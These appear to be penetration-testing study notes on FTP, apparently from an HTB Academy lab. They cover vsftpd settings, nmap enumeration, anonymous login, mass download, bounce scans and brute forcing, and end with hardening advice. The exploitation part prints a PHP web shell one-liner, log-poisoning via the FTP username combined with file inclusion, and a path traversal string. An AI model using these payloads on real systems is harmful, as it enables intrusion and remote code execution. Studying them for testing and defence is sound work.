FTP Characteristics:
- Ports: 21 (control), 20 (data)
- Protocol: TCP-based
- Authentication: Clear-text (unless FTPS)
- Modes: Active vs Passive
FTP Connection Types:
- Active FTP: Client opens control channel (port 21), server initiates data channel (port 20)
- Passive FTP: Client initiates both control and data channels (firewall-friendly)
TFTP (Trivial FTP):
- Port: 69/UDP
- Authentication: None
- Features: Simplified, no directory listing
- Security: Local networks only
| Server | Description | Config File |
|---|---|---|
| vsftpd | Very Secure FTP Daemon | /etc/vsftpd.conf |
| ProFTPD | Professional FTP server | /etc/proftpd/proftpd.conf |
| Pure-FTPd | Secure FTP server | /etc/pure-ftpd/pure-ftpd.conf |
Installation and Setup:
sudo apt install vsftpd
cat /etc/vsftpd.conf | grep -v "#"Key Configuration Settings:
| Setting | Value | Description |
|---|---|---|
listen=NO |
YES/NO | Run as standalone daemon? |
anonymous_enable=NO |
YES/NO | Allow anonymous access? |
local_enable=YES |
YES/NO | Allow local users to login? |
write_enable=YES |
YES/NO | Allow FTP write commands? |
dirmessage_enable=YES |
YES/NO | Display directory messages? |
xferlog_enable=YES |
YES/NO | Log uploads/downloads? |
connect_from_port_20=YES |
YES/NO | Use port 20 for data? |
ssl_enable=NO |
YES/NO | Enable SSL/TLS encryption? |
User Access Control:
# File controlling FTP access
cat /etc/ftpusers
guest
john
kevinanonymous_enable=YES # Allow anonymous login
anon_upload_enable=YES # Anonymous upload capability
anon_mkdir_write_enable=YES # Anonymous directory creation
no_anon_password=YES # No password required
anon_root=/home/username/ftp # Anonymous user directory
write_enable=YES # Enable write commandshide_ids=YES # Hide real UIDs/GIDs (show as 'ftp')
ls_recurse_enable=YES # Allow recursive listings
chroot_local_user=YES # Jail users in home directory
chroot_list_enable=YES # Use chroot listBasic FTP Scan:
# Standard FTP scan
sudo nmap -sV -p21 -sC -A target_ip
# FTP-specific scripts
sudo nmap -p21 --script ftp-* target_ipAvailable Nmap FTP Scripts:
# Find FTP scripts
find /usr/share/nmap/scripts/ -name "*ftp*"
ftp-anon.nse # Anonymous FTP testing
ftp-banner.nse # Banner grabbing
ftp-bounce.nse # FTP bounce attack testing
ftp-brute.nse # FTP brute force
ftp-libopie.nse # libopie buffer overflow
ftp-proftpd-backdoor.nse # ProFTPD backdoor detection
ftp-syst.nse # System information
ftp-vsftpd-backdoor.nse # vsftpd backdoor detection
ftp-vuln-cve2010-4221.nse # ProFTPD directory traversalExample Nmap Output:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 1002 1002 220 Apr 16 2021 test.txt
|_Only these file types are allowed: txt, log, cfg
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.4
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status# Netcat banner grabbing
nc -nv target_ip 21
# Telnet banner grabbing
telnet target_ip 21
# Example response:
220 (vsFTPd 3.0.3)# Basic anonymous login
ftp target_ip
# Username: anonymous
# Password: anonymous (or your email)
# Alternative anonymous credentials
# Username: ftp
# Password: ftp
# Successful anonymous login example:
Connected to target_ip.
220 (vsFTPd 3.0.3)
Name (target_ip:user): anonymous
331 Please specify the password.
Password: anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>Basic Commands:
# List files and directories
ftp> ls
ftp> dir
# Long format listing
ftp> ls -la
# Navigate directories
ftp> cd directory_name
ftp> pwd
# Download files
ftp> get filename.txt
ftp> mget *.txt
# Binary mode for executables/images
ftp> binary
ftp> get application.exeMass Download:
# Download all accessible files using wget
wget -m --no-passive ftp://anonymous:anonymous@target_ip
# Results in directory structure:
tree target_ip/
└── target_ip
├── Calendar.pptx
├── Clients
│ └── Inlanefreight
│ ├── appointments.xlsx
│ ├── contract.docx
│ └── meetings.txt
└── Important Notes.txtFile Upload Testing:
# Create test file
touch testupload.txt
# Upload test
ftp> put testupload.txt
local: testupload.txt remote: testupload.txt
---> STOR testupload.txt
150 Ok to send data.
226 Transfer complete.
# Verify upload
ftp> ls
-rw------- 1 1002 133 0 Sep 15 14:57 testupload.txtConnecting to FTPS:
# OpenSSL for FTPS connection
openssl s_client -connect target_ip:21 -starttls ftp
# Certificate information extraction
CONNECTED(00000003)
depth=0 C = US, ST = California, L = Sacramento, O = Inlanefreight,
OU = Dev, CN = master.inlanefreight.htb,
emailAddress = admin@inlanefreight.htbInformation from SSL Certificates:
- Hostname: master.inlanefreight.htb
- Organization: Inlanefreight
- Email: admin@inlanefreight.htb
- Location: Sacramento, California
Concept: Use FTP server as proxy for port scanning
# Nmap FTP bounce scan
nmap -b anonymous:password@ftp_server target_network
# Manual FTP bounce
ftp> port 192,168,1,100,0,22 # Target 192.168.1.100:22
ftp> list # Trigger connectionCommon Configuration Weaknesses:
# Dangerous permission settings
-rwxrwxrwx files (world-writable)
drwxrwxrwx directories (world-writable)
# Information disclosure
hide_ids=NO (shows real UIDs/GIDs)
ls_recurse_enable=YES (allows recursive listing)
# Authentication bypasses
anonymous_enable=YES
no_anon_password=YES- Risk: Unauthorized file access/upload
- Detection:
ftp-anonNmap script - Exploitation: Mass download, malicious uploads
- Risk: Credential interception
- Detection: Network sniffing
- Mitigation: Use FTPS/SFTP
- Risk: Access outside FTP root
- Exploitation:
../../../etc/passwd - Detection: Manual testing
- Risk: Web shell upload
- Exploitation: Upload PHP/ASPX shells
- Impact: Remote code execution
# Create PHP web shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
# Upload to web-accessible FTP directory
ftp> put shell.php
# Access via web browser
http://target.com/ftp_dir/shell.php?cmd=id# Inject code in FTP logs via username
ftp target_ip
# Username: <?php system($_GET['cmd']); ?>
# Include FTP log in LFI
http://target.com/page.php?file=/var/log/vsftpd.log&cmd=id# Exploit writable config
ftp> put malicious.conf vsftpd.conf
# Service restart triggers malicious config
# Potential RCE or privilege escalation- Port 21 TCP scan with version detection
- Anonymous access testing
- Banner grabbing and version identification
- SSL certificate analysis (if FTPS)
- Anonymous login attempt
- Default credentials testing
- Brute force attack (if applicable)
- User enumeration
- Directory listing permissions
- Recursive listing capabilities
- Hidden files/directories
- File permissions analysis
- Download capabilities
- Upload capabilities
- File modification permissions
- Directory creation permissions
- Directory traversal attempts
- FTP bounce attack testing
- Buffer overflow testing
- Configuration file access
# Built-in FTP client
ftp target_ip
# Netcat for raw interaction
nc -nv target_ip 21
# OpenSSL for FTPS
openssl s_client -connect target_ip:21 -starttls ftp
# Wget for mass download
wget -m --no-passive ftp://user:pass@target_ip# Nmap with FTP scripts
nmap -p21 --script ftp-* target_ip
# Hydra for brute forcing
hydra -l user -P passwords.txt ftp://target_ip
# FTP enumeration scripts
ftpmap -s target_ip- Disable anonymous access unless required
- Use strong authentication mechanisms
- Implement SSL/TLS encryption (FTPS)
- Restrict file permissions and chroot users
- Log and monitor FTP activities
- Regular security updates and patches
- Firewall rules to restrict FTP access
- VPN requirements for external access
- Network segmentation for FTP servers
- Intrusion detection for FTP anomalies
- HTB Academy: Host Based Enumeration - FTP
- vsftpd Documentation: https://security.appspot.com/vsftpd.html
- RFC 959: File Transfer Protocol (FTP)
- OWASP Testing Guide: Testing for FTP